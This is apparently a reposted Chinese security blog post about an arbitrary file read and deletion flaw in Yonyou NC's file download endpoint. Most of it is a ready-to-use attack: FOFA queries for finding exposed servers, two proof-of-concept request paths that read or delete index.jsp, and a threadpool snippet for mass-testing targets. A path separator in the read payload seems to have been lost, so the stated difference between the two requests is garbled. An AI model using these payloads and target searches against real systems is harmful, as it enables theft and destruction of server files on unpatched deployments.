用友NC的download文件存在任意文件读取和任意文件删除漏洞,攻击者可以利用该漏洞读取或删除服务器上的敏感文件。
资产
fofa:app="用友-UFIDA-NC"
![[1day]用友NC存在任意文件读取删除漏洞[附批量POC]](http://cn-sec.com/wp-content/uploads/2023/12/7-1702109148.png "[1day]用友NC存在任意文件读取删除漏洞[附批量POC]")
fofa:title="YONYOU NC"
![[1day]用友NC存在任意文件读取删除漏洞[附批量POC]](http://cn-sec.com/wp-content/uploads/2023/12/8-1702109149.png "[1day]用友NC存在任意文件读取删除漏洞[附批量POC]")
漏洞复现
任意文件读取:
POC:
/portal/pt/xml/file/download?pageId=login&filename=..index.jsp
任意文件删除:
/portal/pt/xml/file/download?pageId=login&filename=../index.jsp
区别在于""和"/"
直接拼接URL即可下载文件
![[1day]用友NC存在任意文件读取删除漏洞[附批量POC]](http://cn-sec.com/wp-content/uploads/2023/12/10-1702109150.png "[1day]用友NC存在任意文件读取删除漏洞[附批量POC]")
批量测试:
通过线程池进行批量测试
withconcurrent.futures.ThreadPoolExecutor(max_workers=8)asexecutor:executor.map(check_vulnerability, targets)
更改max_workers即可限制线程池数量
![[1day]用友NC存在任意文件读取删除漏洞[附批量POC]](http://cn-sec.com/wp-content/uploads/2023/12/4-1702109152.png "[1day]用友NC存在任意文件读取删除漏洞[附批量POC]")
原文始发于微信公众号(知攻善防实验室):[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论